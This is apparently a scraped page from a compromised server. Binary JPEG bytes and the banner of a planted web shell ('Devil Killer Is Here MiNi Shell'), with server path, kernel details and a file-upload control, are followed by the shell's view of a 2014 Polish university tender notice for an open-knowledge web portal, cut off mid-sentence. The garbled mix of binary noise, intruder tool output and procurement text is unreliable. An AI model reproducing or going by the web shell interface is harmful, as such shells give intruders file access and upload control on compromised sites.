JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140303/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140303/70224-N-2014.html

<p class="kh_header"><b>Lublin: Wykonanie i wdrożenie  portalu internetowego Wortal Otwartej Wiedzy (WOW), dostarczenie niezbędnego oprogramowania i sprzętu, przygotowanie dokumentacji, instrukcji, szkolenie użytkowników oraz wsparcie techniczne i graficzno-programistyczne dla potrzeb projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy współfinansowanego ze środków Europejskiego Funduszu Społecznego (oznaczenie sprawy: DK/1/2014-POKL.4.1.1/362).</b><br>
<b>Numer ogłoszenia: 70224 - 2014; data zamieszczenia: 03.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Marii Curie-Skłodowskiej , Pl. M. Curie-Skłodowskiej 5, 20-031 Lublin, woj. lubelskie, tel. 081 5375965, faks 081 5375965.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umcs.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i wdrożenie  portalu internetowego Wortal Otwartej Wiedzy (WOW), dostarczenie niezbędnego oprogramowania i sprzętu, przygotowanie dokumentacji, instrukcji, szkolenie użytkowników oraz wsparcie techniczne i graficzno-programistyczne dla potrzeb projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy współfinansowanego ze środków Europejskiego Funduszu Społecznego (oznaczenie sprawy: DK/1/2014-POKL.4.1.1/362)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie i wdrożenie  portalu internetowego Wortal Otwartej Wiedzy (WOW), dostarczenie niezbędnego oprogramowania i sprzętu, przygotowanie dokumentacji, instrukcji, szkolenie użytkowników oraz wsparcie techniczne i graficzno-programistyczne dla potrzeb projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy współfinansowanego ze środków Europejskiego Funduszu Społecznego (oznaczenie sprawy: DK/1/2014-POKL.4.1.1/362).
OPIS PRZEDMIOTU ZAMÓWIENIA: 1. Opracowanie i wykonanie serwisu internetowego wraz z przeniesieniem praw autorskich / udzieleniem licencji. 2. Zaprojektowanie, utworzenie, dostawa, instalacja i konfiguracja niezbędnego oprogramowania dla utworzenia portalu internetowego Wortal Otwartej Wiedzy (WOW) 3. Wdrożenie e-repozytorium dokumentów i multimediów. 4. Stworzenie czasopisma naukowego (na podstawie dostarczanych przez Zamawiającego treści). 5. Zakup dwóch odpowiednich serwerów sieciowych dla portalu internetowego Wortal Otwartej Wiedzy (WOW) - oddzielny dla Repozytorium Plików w tym dostawa, instalacja i konfiguracja serwerów. 6. Szkolenia. 7. Wsparcie techniczne i graficzno-programistyczne 8. Gwarancja
Szczegółowy opis przedmiotu zamówienia zostanie przekazany wyłonionym Wykonawcom wraz z zaproszeniem do składania ofert. TERMIN REALIZACJI ZAMÓWIENIA: Etap I: Opracowanie, wykonanie i wdrożenie całości portalu internetowego Wortal Otwartej Wiedzy (WOW) - 3 miesiące od dnia zawarcia umowy; Etap II: Szkolenia użytkowników do 1 miesiąca od momentu odebrania Etapu I.; Etap III:Wsparcie techniczne i graficzno-programistyczne 12 miesięcy od odebrania etapu I..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8, 72.00.00.00-5, 72.21.22.24-5, 48.22.40.00-4, 48.82.50.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zaproszony do udziału w postępowaniu przed terminem składania oferty zobowiązany jest wnieść wadium w wysokości: 1 900,00 zł (słownie: jeden tysiąc dziewięćset złotych). Wadium winno być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach: 1) Pieniądzu, wpłaconym przelewem na rachunek bankowy Zamawiającego: BRE BANK S.A. O/Lublin, Nr konta: 98 1140 1094 0000 2905 1600 1075 z dopiskiem: Wykonanie i wdrożenie  portalu internetowego Wortal Otwartej Wiedzy (WOW) dla potrzeb projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy (oznaczenie sprawy: DK/1/2014-POKL.4.1.1/362), 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. Dowód wniesienia wadium powinien być dołączony do oferty. Warunki zwrotu i utraty wadium są określone w art. 46 ustawy. Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku zostanie uznane jeśli Wykonawca przedstawi wykaz minimum trzech serwisów internetowych* o wartości nie mniejszej niż 50 000,00 zł brutto każdy, które zostały wykonane przez Wykonawcę w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykaz powinien zawierać nazwę każdego wykonanego serwisu internetowego oraz adres internetowy (strony głównej serwisu i wersji mobilnej, o ile serwis ją posiada), datę wykonania, wartość brutto, odbiorcę na rzecz którego wykonano usługę. Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie serwisów. *Serwis internetowy jest tutaj rozumiany jako grupa powiązanych ze sobą stron internetowych, pojedynczych dokumentów sieciowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia spełniającą następujące wymagania: 
Kierownik projektu: posiada doświadczenie przy realizacji co najmniej dwóch usług polegających każda na wykonaniu i wdrożeniu portalu internetowego zawierającego integrację min. 3 narzędzi internetowych na stanowisku kierownika projektu, w tym co najmniej jeden portal internetowy posiadający procesy interakcji z użytkownikami w zakresie współdzielenia treści, komentowania treści.
Programista: posiada co najmniej 2 lata doświadczenia na stanowisku programisty przy tworzeniu i wdrożeniu co najmniej 2 portali internetowych.
Specjalista ds. baz danych: posiada co najmniej 2 lata doświadczenie na stanowisku specjalista ds. baz danych lub zbieżnym, pracował przy tworzeniu i wdrożeniu co najmniej 2 portali internetowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 2. Zapisy dotyczące uwag odnośnie formy składanych dokumentów oraz dokumentów wymaganych od Wykonawcy mającego siedzibę lub miejsce zamieszkania za granicą stosuje się odpowiednio.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
1. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów złożonych przez Wykonawców, na zasadzie SPEŁNIA/NIE SPEŁNIA. 2. Jeżeli liczba Wykonawców, którzy złożyli wniosek o dopuszczenie do udziału w postępowaniu i spełniają warunki udziału w postępowaniu nie przekroczy 3, Zamawiający zaprosi do dialogu wszystkich Wykonawców, którzy spełniają warunki udziału w postępowaniu. 3. Jeżeli liczba Wykonawców, którzy złożyli wniosek o dopuszczenie do udziału w postępowaniu i spełniają warunki udziału w postępowaniu będzie większa niż 3, Zamawiający zaprosi do dialogu 3 Wykonawców, którzy otrzymali najwyższą łączną liczbę punktów w rankingu Wykonawców. 4. Ranking Wykonawców zostanie przeprowadzony w oparciu o wykaz stron/serwisów internetowych zgodnie z wzorem nr 8, o wartości każdej z usług nie mniejszej niż 50 000,00 zł brutto. Zamawiający będzie przyznawał punkty za każdy wymieniony w wykazie aktywny, dostępny publicznie*, wykonany osobiście przez Wykonawcę strona/serwis internetowy i jeżeli serwis będzie posiadał wersję mobilną. Za każdą stronę/serwis internetowy wykonany przez Wykonawcę osobiście, Wykonawca otrzyma 1 punkt. Następnie za każdą aktywną, dostępną publicznie stronę/serwis internetowy, Wykonawca otrzyma 1 punkt. Dodatkowo, jeżeli serwis będzie posiadał wersję mobilną dodany zostanie 1 punkt. Za każdą wymienioną w wykazie stronę/serwis internetowy można otrzymać maksymalnie 3 punkty. *Aktywność i publiczna dostępność stron/serwisów internetowych wskazanych w wykazie usług są warunkiem poprawnego przeprowadzenia weryfikacji wymagań Zamawiającego dotyczących złożonej budowy serwisów internetowych i obecności wersji mobilnych. 5. W przypadku, gdy dwóch lub więcej Wykonawców otrzyma tę samą łączną liczbę punktów o kolejności w rankingu Wykonawców decydować będzie liczba punktów przyznana za strony/serwisy internetowe ujęte w wykazie (wzór nr 8). 6. W przypadku, gdy dwóch lub więcej Wykonawców otrzyma tę samą łączną liczbę punktów za wykonanie usług ujętych w wykazie wzór nr 8, wówczas o kolejności w rankingu Wykonawców zdecyduje łączna wartość brutto usług ujętych w wykazie wzór nr 8. Wyższą lokatę otrzyma Wykonawca, który zrealizował i wykazał w wykazie usługi na większą kwotę łączną.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wsparcie techniczne i graficzno-programistyczne - 20</li>
<li>3 - Okres gwarancji - 10</li>
<li>4 - Czas reakcji Wykonawcy na zgłoszenie usterki - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany zostaną szczegółowo określone w Specyfikacji Istotnych Warunków Zamówienia. Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy w przypadku:
a)	zmiany danych teleadresowych Wykonawcy;
b)	zmiany osób wskazanych w umowie;
c)	konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez Strony, zmiana nie może spowodować zmiany ceny wynikającej z oferty Wykonawcy;
d)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
e)	Zmiany stawki podatku od towarów i usług (VAT) prowadzącej do zmiany ceny.
f)	wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznie niemożliwego do przewidzenia i niemożliwego do zapobieżenia;
g)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy;
h)	wystąpienia omyłek pisarskich i rachunkowych w treści umowy;
i)	gdy zmiany będą korzystne dla Zamawiającego;
j)	aktualizacji rozwiązań ze względu na postęp techniczny lub technologiczny (np. wycofanie z obrotu urządzeń lub materiałów, np. serwery), zmiana nie może spowodować podwyższenia ceny oraz obniżenia parametrów technicznych, jakościowych i innych wynikających z oferty na podstawie której był dokonany wybór Wykonawcy;
k)	wprowadzenia nowej technologii lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca może ją odpowiednio obniżyć;
l)	wprowadzenia nowej technologii produktu objętego przedmiotową umową, wówczas Zamawiający dopuszcza możliwość jego zastąpienia jedynie produktem równoważnym lub o wyższych parametrach jakościowych, o cenie nie wyższej niż w umowie;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ Zamawiający przekaże Wykonawcom zaproszonym do składania ofert..</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> Zamawiający, zgodnie z art. 60 c) ust. 1 ustawy Pzp, przedstawia na stronie www.przetargi.umcs.pl opis potrzeb i wymagań Zamawiającego, dotyczący realizacji zamówienia..</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje przyznawania nagród dla Wykonawców..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2014 godzina 11:00, miejsce: UNIWERSYTET MARII CURIE-SKŁODOWSKIEJ, Zespół Zamówień Publicznych, plac Marii Curie-Skłodowskiej 5, 20-031 Lublin, budynek Rektoratu, XII piętro, pok.1201..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Pisemny Wniosek o dopuszczenie do udziału w postępowaniu wraz z wszystkimi wymaganymi dokumentami i oświadczeniami potwierdzającymi spełnienie warunków udziału w postępowaniu oraz warunków dotyczących nie podlegania wykluczeniu z postępowania na podstawie art. 24 ust. 1 Ustawy, należy złożyć w miejscu wskazanym w pkt IV.4.4) Ogłoszenia w opakowaniu uniemożliwiającym zapoznanie się z jego treścią przed upływem terminu składania wniosków. Wykonawca powinien umieścić wniosek w zamkniętej kopercie (opakowaniu). Na kopercie (opakowaniu) powinny widnieć nazwa i adres Zamawiającego oraz następujące oznaczenie: Wykonanie i wdrożenie  portalu internetowego Wortal Otwartej Wiedzy (WOW) dla potrzeb projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy (oznaczenie sprawy: DK/1/2014-POKL.4.1.1/362) oraz: nie otwierać przed dniem 12.03.2014 r. godz. 11:00. Na kopercie należy podać również nazwę i adres Wykonawcy oraz opatrzyć ją pieczęcią Wykonawcy. Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem wniosku o dopuszczenie do udziału w postępowaniu. 2.Wniosek, oświadczenia i dokumenty należy złożyć w języku polskim. Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski. Przykładowe wzory wniosku oraz oświadczeń znajdują się w wersji elektronicznej na stronie internetowej Zamawiającego www.przetargi.umcs.pl. 3.Dokumenty mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku składania oświadczeń lub dokumentów przez inne podmioty o których mowa w art. 26 ust. 2b, kopie tych dokumentów poświadcza za zgodność z oryginałem Wykonawca lub ten podmiot. 4.W przypadku podpisania wniosku i innych dokumentów (oraz poświadczania za zgodność z oryginałem kopii dokumentów) przez osobę nie wskazaną w dokumencie rejestrowym do reprezentowania Wykonawcy, należy do wniosku dołączyć stosowne pełnomocnictwo. 5.Wykonawcy ubiegający się wspólnie o udział w dialogu konkurencyjnym załączają do wniosku pełnomocnictwo do reprezentowania Wykonawców trakcie postępowania lub pełnomocnictwo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy. 6.Pełnomocnictwo powinno być złożone w formie pisemnej (oryginał) lub notarialnie poświadczonej kopii lub poświadczone za zgodność z oryginałem przez osobę udzielającą pełnomocnictwa. 7.Odnośnie wymagań dotyczących rodzaju, formy i języka, w jakich złożone powinny być dokumenty potwierdzające spełnianie warunków udziału w postępowaniu oraz potwierdzających brak podstaw do wykluczenia z powodu nie spełniania warunków, o których mowa w art. 24 ust. 1 Ustawy, stosuje się przepisy Ustawy oraz przepisy rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013r. poz. 231). 8.Zamawiający będzie porozumiewał się z wykonawcami pisemnie lub za pośrednictwem faksu. Osobą upoważnioną do porozumiewania się z Wykonawcami jest: w sprawach merytorycznych - Joanna Kuropatnicka - tel. (081) 537-53-79; w sprawach formalnych - Krzysztof Bartosik - tel. (081) 537-51-79. 9.Na etapie składania wniosków o dopuszczenie do udziału w postępowaniu nie przewiduje się udzielania wyjaśnień dotyczących ogłoszenia o zamówieniu. 10.Postępowanie jest prowadzone zgodnie z przepisami ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013, Nr 113, poz. 907 ze zm.). 11. Wykonawcy, którzy złożą wniosek o dopuszczenie do udziału w postępowaniu i będą spełniali określone przez Zamawiającego w ogłoszeniu warunki (w liczbie określonej w ogłoszeniu) zostaną zaproszeni do dialogu. Prowadzony dialog ma charakter poufny i może dotyczyć wszelkich aspektów zamówienia. Żadna ze stron nie może bez zgody drugiej strony ujawnić informacji technicznych i handlowych związanych z dialogiem. Podczas każdego spotkania stron na bieżąco sporządzane będą protokoły. O zakończeniu dialogu Zamawiający niezwłocznie informuje uczestniczących w nim Wykonawców. Zamawiający może przed zaproszeniem do składania ofert dokonać zmiany wymagań będących przedmiotem dialogu. 12. Zamówienie w zakresie wykonania i wdrożenia portalu internetowego Wortal Otwartej Wiedzy (WOW) dla potrzeb projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy (oznaczenie sprawy: DK/1/2014-POKL.4.1.1/362) współfinansowane jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w związku z realizacją projektu pt. Nowoczesny 